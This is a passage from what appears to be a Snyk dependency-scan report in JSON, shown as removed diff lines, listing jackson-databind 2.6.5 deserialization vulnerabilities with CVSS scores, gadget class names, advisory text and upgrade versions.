- { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the 